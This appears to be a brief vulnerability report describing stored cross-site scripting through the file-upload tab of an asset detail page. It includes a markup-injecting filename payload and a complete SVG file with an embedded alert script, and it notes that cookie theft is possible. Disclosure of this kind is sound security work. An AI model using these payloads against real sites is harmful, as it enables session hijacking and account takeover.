At File Uploads allows for arbitrary execution of JavaScript
Goto detail of one asset
At tab File choose to upload file with filename contain payload: file'><img src>name
Goto detail of one asset
At tab File choose to upload file svg with contain payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
When uploaded, click to download
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.